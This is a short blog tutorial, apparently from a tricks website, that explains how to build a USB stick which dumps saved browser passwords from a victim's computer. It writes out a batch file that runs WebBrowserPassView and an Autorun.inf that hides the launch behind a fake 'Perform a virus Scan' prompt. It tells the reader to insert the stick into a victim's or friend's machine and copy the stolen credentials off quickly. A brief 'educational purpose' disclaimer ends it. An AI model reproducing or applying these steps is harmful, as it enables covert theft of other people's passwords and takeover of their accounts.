Hey Guys , Today I am going to show you that how to make a Portable Hacking device with a Pendrive that can hack most of the online passwords from victims computer and with the help of this program you can also help your friends and relatives to recover their forgotten passwords, Yes you heard it right after following this tutorial you can hack like a pro and the tutorial is very easy.
Anyone who has a basic computer knowledge can do this tutorial Easily. During the time of tutorial if you find any queries then please feel free to ask us by simply commenting in the comment box and we will get to you asap.You an Visit trickscue.com For More Tricks
How To Steel Passwords From A Computer By A Pendrive :-
- Download Web Browser Pass views Zip file this link.
- Insert your Pendrive to your Computer and then Quick Format It as NTFS
- Create a New Folder in your Pendrive and name the folder as “USB” and then Extract the Web Browser Passview zip file into the USB folder.
- Open a Notepad and then copy the things written below and then Save the File As drive.bat.
@echo off cls start \usb\WebBrowserPassView.exe /shtml 1.html
5. Open a Notepad and then copy the things written below and then Save the File As Autorun.inf
[autorun] open=drive.bat Action=Perform a virus Scan
6.Copy both the file Autorun.inf and drive.bat into your pen drive
7.Insert it into your Victims computer and you will see that after inserting it will ask for Performing a Virus Scan and then tap yes and after tapping you will get a screen Like this, just tap ctrl+a and then Ctrl+s and save the file to your pen drive, do it fast, Now open that Notepad file that you have saved, Voila, you got the passcodes of your friend.
Note: Sometimes the Autorun File doesn’t work in that criteria, you have to open the pen drive partition and then double click on Usb Driver and after that just tap ctrl+a and then Ctrl+s and save the file to your pen drive. Make sure that you are doing it fast.
Every Tutorial in Gadgetsay is for an educational purpose we are not responsible for any loss.